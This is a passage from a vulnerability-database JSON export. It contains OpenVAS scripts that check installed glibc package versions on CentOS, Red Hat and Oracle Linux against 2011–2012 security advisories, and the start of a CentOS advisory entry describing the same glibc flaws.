URL\";\n\ntag_affected = \"glibc on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-February/018427.html\");\n script_id(881217);\n script_version(\"$Revision: 8249 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:48:09 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\",\n \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0125\");\n script_name(\"CentOS Update for glibc CESA-2012:0125 centos4 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nptl-devel\", rpm:\"nptl-devel~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-23T15:17:16", "references": ["2012:0125-01", "https://www.redhat.com/archives/rhsa-announce/2012-February/msg00026.html"], "pluginID": "1361412562310870545", "description": "The remote host is missing an update for the ", "edition": 6, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-02-21T00:00:00", "title": "RedHat Update for glibc RHSA-2012:0125-01", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870545", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870545", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2012:0125-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00026.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870545\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-21 18:55:19 +0530 (Tue, 21 Feb 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\",\n \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2012:0125-01\");\n script_name(\"RedHat Update for glibc RHSA-2012:0125-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_4\");\n script_tag(name:\"affected\", value:\"glibc on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n\n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n\n It was discovered that the glibc addmntent() function, used by various\n mount helper utilities, did not sanitize its input properly. A local\n attacker could possibly use this flaw to inject malformed lines into the\n mtab (mounted file systems table) file via certain setuid mount helpers, if\n the attacker were allowed to mount to an arbitrary directory under their\n control. (CVE-2010-0296)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n\n It was discovered that the glibc fnmatch() function did not properly\n restrict the use of alloca(). If the function was called on sufficiently\n large inputs, it could cause an application using fnmatch() to crash or,\n possibly, execute arbitrary code with the privileges of the application.\n (CVE-2011-1071)\n\n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n\n It was discovered that the locale command did not produce properly escaped\n output as required by the POSIX specification. If an attacker were able to\n set the locale environment ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nptl-devel\", rpm:\"nptl-devel~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:58:07", "references": ["2012:0125-01", "https://www.redhat.com/archives/rhsa-announce/2012-February/msg00026.html"], "pluginID": "870545", "description": "Check for the Version of glibc", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-02-21T00:00:00", "title": "RedHat Update for glibc RHSA-2012:0125-01", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2017-12-29T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870545", "id": "OPENVAS:870545", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2012:0125-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n\n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n\n It was discovered that the glibc addmntent() function, used by various\n mount helper utilities, did not sanitize its input properly. A local\n attacker could possibly use this flaw to inject malformed lines into the\n mtab (mounted file systems table) file via certain setuid mount helpers, if\n the attacker were allowed to mount to an arbitrary directory under their\n control. (CVE-2010-0296)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n\n It was discovered that the glibc fnmatch() function did not properly\n restrict the use of alloca(). If the function was called on sufficiently\n large inputs, it could cause an application using fnmatch() to crash or,\n possibly, execute arbitrary code with the privileges of the application.\n (CVE-2011-1071)\n\n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n\n It was discovered that the locale command did not produce properly escaped\n output as required by the POSIX specification. If an attacker were able to\n set the locale environment ...\n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"glibc on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00026.html\");\n script_id(870545);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-21 18:55:19 +0530 (Tue, 21 Feb 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\",\n \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2012:0125-01\");\n script_name(\"RedHat Update for glibc RHSA-2012:0125-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nptl-devel\", rpm:\"nptl-devel~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-28T18:24:18", "references": ["http://linux.oracle.com/errata/ELSA-2011-1526.html"], "pluginID": "1361412562310122033", "description": "Oracle Linux Local Security Checks ELSA-2011-1526", "edition": 6, "reporter": "Eero Volotinen", "published": "2015-10-06T00:00:00", "title": "Oracle Linux Local Check: ELSA-2011-1526", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1089", "CVE-2009-5064"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122033", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122033", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2011-1526.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122033\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:11:58 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2011-1526\");\n script_tag(name:\"insight\", value:\"ELSA-2011-1526 - glibc security, bug fix, and enhancement update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2011-1526\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2011-1526.html\");\n script_cve_id(\"CVE-2009-5064\", \"CVE-2011-1089\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.47.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.47.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.47.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.47.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.12~1.47.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.47.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.47.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:26:11", "references": ["https://rhn.redhat.com/errata/RHSA-2012-0126.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "packageFilename": "glibc-headers-2.5-65.el5_7.3.x86_64.rpm", "packageName": "glibc-headers", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "packageFilename": "glibc-2.5-65.el5_7.3.i686.rpm", "packageName": "glibc", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "packageFilename": "glibc-2.5-65.el5_7.3.i686.rpm", "packageName": "glibc", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "packageFilename": "glibc-utils-2.5-65.el5_7.3.i386.rpm", "packageName": "glibc-utils", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "packageFilename": "glibc-common-2.5-65.el5_7.3.x86_64.rpm", "packageName": "glibc-common", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "packageFilename": "glibc-devel-2.5-65.el5_7.3.i386.rpm", "packageName": "glibc-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "packageFilename": "glibc-devel-2.5-65.el5_7.3.i386.rpm", "packageName": "glibc-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "packageFilename": "glibc-utils-2.5-65.el5_7.3.x86_64.rpm", "packageName": "glibc-utils", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "packageFilename": "glibc-2.5-65.el5_7.3.i386.rpm", "packageName": "glibc", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "packageFilename": "nscd-2.5-65.el5_7.3.i386.rpm", "packageName": "nscd", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "packageFilename": "nscd-2.5-65.el5_7.3.x86_64.rpm", "packageName": "nscd", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "packageFilename": "glibc-2.5-65.el5_7.3.x86_64.rpm", "packageName": "glibc", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "packageFilename": "glibc-devel-2.5-65.el5_7.3.x86_64.rpm", "packageName": "glibc-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "packageFilename": "glibc-headers-2.5-65.el5_7.3.i386.rpm", "packageName": "glibc-headers", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "packageFilename": "glibc-2.5-65.el5_7.3.src.rpm", "packageName": "glibc", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "packageFilename": "glibc-common-2.5-65.el5_7.3.i386.rpm", "packageName": "glibc-common", "arch": "i386", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2012:0126\n\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to crash\nor, potentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\nSecurity Team acknowledges Dan Rosenberg as the original reporter of\nCVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-February/018428.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0126.html", "edition": 1, "reporter": "CentOS Project", "published": "2012-02-13T22:06:54", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "glibc, nscd security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2012-02-13T22:06:54", "href": "http://lists.centos.org/pipermail/centos-announce/2012-February/018428.html", "id": "CESA-2012:0126", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-12T14:44:51", "references": ["https://rhn.redhat.com/errata/RHSA-2012-0125.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "glibc-utils-2.3.4-2.57.i386.rpm", "packageName": 